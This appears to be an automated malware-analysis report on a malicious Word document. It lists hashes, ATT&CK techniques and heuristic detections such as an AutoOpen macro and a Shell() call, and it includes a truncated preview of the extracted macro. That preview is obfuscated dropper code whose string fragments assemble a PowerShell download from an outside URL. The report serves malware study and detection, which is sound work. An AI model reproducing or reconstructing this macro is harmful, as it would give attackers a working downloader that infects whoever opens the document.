Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a73924f6b3bc139c…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 191.5 KB
Created: 2017-12-27 14:33:00
Authoring application: Microsoft Office Word
First seen: 2018-01-08
MD5: 5f58ae772d7eab98385d07c8f4b7886e
SHA-1: d03c0e59184eac1988f237a2529934998980e267
SHA-256: a73924f6b3bc139c6f2365bc45eb1fa7727d6bfcea45ed3f9b21f97995d3daae
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample contains a VBA macro with an AutoOpen function that calls Shell(), indicating an attempt to execute arbitrary code when the document is opened. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' suggests a phishing lure that drops further malicious content. The obfuscated script content prevents a more detailed analysis of the payload, but the presence of Shell() and the heuristic firings strongly suggest downloader or dropper functionality.

Heuristics 8

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 70254 bytes
SHA-256: aa95c8479391df8048c73368c2d69ea8547739ca5fb022d63d70b4cdf9a5f590
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mVRnBHjdcqU"
Function RRMvDcXzTUtS()
On Error Resume Next
jZGINzwIT = 871 / Rnd(4) + ADBRwIuCANT + wHQVuHoJUH * 9 + Int(oLROjVEuk * CStr(aZVtJbPvWHh)) + kJYUVBKQBGtn * CDate(3624 - 352183467 * 84 / 475) / FjtOjvSi - CSng(620)
ovcBzEojNDJ = 871 / Rnd(4) + UqopNzaBoHVOVH + bIQARKTQP * 9 + Int(mXCLPzaJMzhqQV * CStr(MwtPLuUZuQNz)) + ppAZZuaaY * CDate(3624 - 352183467 * 84 / 475) / YHvFIHjkrvSEL - CSng(620)
dIECrKBMzN = Mid("swizjWK8MHqz5CNzdi0Y9L8MnF8InKVkpvvj( $VERBosePREfEreNcE.TOsTRiNG()[1,3]+'x'-jOin'')( (('& ( qINENV:pU2t", 37, 66)
rFUEScsicOw = 871 / Rnd(4) + YivckfYOzAiDbI + LzCkUbTfhjDuV * 9 + Int(pLPCqkpZtQi * CStr(nItFJiYDChsiN)) + ECNvhlChH * CDate(3624 - 352183467 * 84 / 475) / SAkXAmGmFdoLm - CSng(620)
uLYvcijv = 871 / Rnd(4) + nWaYZiDBBjBzjK + qRDRuvijvJftW * 9 + Int(RJhHQDqzkdjmj * CStr(zoRuKXWQ)) + mJzFniPu * CDate(3624 - 352183467 * 84 / 475) / jKjaTpSHzqjZ - CSng(620)
jMWYK = 871 / Rnd(4) + XYWRdIShoYj + MzjtoFAFmIuB * 9 + Int(QaGdkds * CStr(lYJOkEzVl)) + LqNaJDLp * CDate(3624 - 352183467 * 84 / 475) / KhpOdVONhMDE - CSng(620)
jpsqvQNsPf = Mid("qtznfdHnFErQE+gQEuk/gQhmj+hmjE+gQEigQE+gQE'+'Mpi/sjq'+'.SpgQ'+'E+gQElgQE+gQEit(gQE+gQEsjq,gQE+gQEsjgQE+gQEqgQE+gQE);gQE+gQEfbZokqPLjdw", 12, 113)
cNTVczm = 871 / Rnd(4) + IOZlHrljzUBA + zRzDUVjvFWZXUc * 9 + Int(CXfjjBAkfBW * CStr(JChqiaYsAJ)) + WLqpDszOnPIjbo * CDate(3624 - 352183467 * 84 / 475) / RtwhRBzza - CSng(620)
rUqHza = 871 / Rnd(4) + iFWUkzviG + LaqYMhjcYrZ * 9 + Int(TumwQhKOrVLG * CStr(NIHDUsdvBZhls)) + zruTmsw * CDate(3624 - 352183467 * 84 / 475) / bhohOUropPjj - CSng(620)
zfiAmkN = 871 / Rnd(4) + YjrzwjbtbJXsM + rjnjIAVFBPJivT * 9 + Int(uYOQvfMIQqfhn * CStr(fvYjzpl)) + NoZXSiboR * CDate(3624 - 352183467 * 84 / 475) / HBhkIcQSfXWsd - CSng(620)
GHXiOj = Mid("43tkpmi3EJUlHcdSUEWQE+gQEhmj+hmjopgQ'+'E+gQE.chmj+hmjomgQE+gQE/hmj+hmjWgQE+g'+'QEpDpVgQE+'+'gQE1/gQE+gQE,hgQ'+'E+gQEttp://henrycgQE+gQEorgQE+gQErea'+'deagQE+g'+'hmj+hmjQEraujogQE+gQEhmj+hmj.g663htUKtEoWJzBYnmil4", 20, 172)
PYBiIzuS = 871 / Rnd(4) + ZZZEwwqRVELYbM + zBYOsbjZPm * 9 + Int(IDNjSBIGYRV * CStr(nwGUGccJn)) + UqoqVqYs * CDate(3624 - 352183467 * 84 / 475) / JRVnnElmJPUoFc - CSng(620)
tDEfv = 871 / Rnd(4) + JsWbNRNPo + mWOiifpz * 9 + Int(KcwNkulaMwDF * CStr(EmYwoCjU)) + YcjhnFIabimqXq * CDate(3624 - 352183467 * 84 / 475) / imhcqATk - CSng(620)
idaWRDaf = 871 / Rnd(4) + lRmGawmdqBiW + bfSifRLzRISQVq * 9 + Int(uSTPNCEDE * CStr(SCWofmEhq)) + izlInRoT * CDate(3624 - 352183467 * 84 / 475) / TqFGTjXi - CSng(620)
MFzhLfbLo = Mid("NknpOILiOTkUnIh44inrfQT42QEt SygQE+gQ'+'lDP0QTsrh6v", 26, 15)
ForEr = 871 / Rnd(4) + iRbJfrm + MPEUhDHfS * 9 + Int(UZTRjvMUCVHi * CStr(FrcCVdwukrYdIm)) + wiZwXOwLkMljz * CDate(3624 - 352183467 * 84 / 475) / pRFiUzcF - CSng(620)
jtrzi = 871 / Rnd(4) + ZXwZCYUzvS + WkokPYUOhfB * 9 + Int(FjOdXfzuMu * CStr(fvLQFDXjamFQ)) + cTtUhmjqYz * CDate(3624 - 352183467 * 84 / 475) / pouwUvXPbCJoE - CSng(620)
uBTfijwfwWO = 871 / Rnd(4) + mCUrkiu + XJUYTvLGjGfrp * 9 + Int(zBjuZSvonPqh * CStr(uDXNdqZOXdmVW)) + boswNLCFTHpIbs * CDate(3624 - 352183467 * 84 / 475) / VFhmHRDJsCBQ - CSng(620)
cwKhVJQABp = Mid("cBqm7FS9Ihz3ljiaPgQE+gQEXgQE+gQEhmj+hmjlkaragQE+gQEhmj+hmjpgQ'+'E+gQEas = fXlnsgQE+hmj+hmjgQEagQE+gQEdasgQE+gQEd.nextgQE+gQE(1, 3432gQE+gQE45);fgQE+gQEXgQE+gQElhuas =gQ'+SQ", 18, 153)
LvZIv = 871 / Rnd(4) + OLJvalzT + BElfMaLrGvTaR * 9 + Int(aPfOpoUS * CStr(pMSbZuzOrVw)) + siQLpPLDtkhwB * CDate(3624 - 352183467 * 84 / 475) / jvWKiWjZwStw - CSng(620)
YHaGb = 871 / Rnd(4) + ZzDuopPWYV + NqivKtSifoXM * 9 + Int(hflEOhDJS * CStr(PtjdkFTjQZbhQl)) + GspMPjBkoMIEKH * CDate(3624 - 352183467 * 84 / 475) / SbvrPCbPhdLEH - CSng(620)
isXiCXdT = 871 / Rnd(4) + zIjcEUQihPDz + JPlFfWZqOC * 9 + Int(jraJSmzRrdOuM * CStr(cclAzjTL)) + NToqnXY * CDate(3624 - 352183467 * 84 / 475) / iGovNuGP
... (truncated)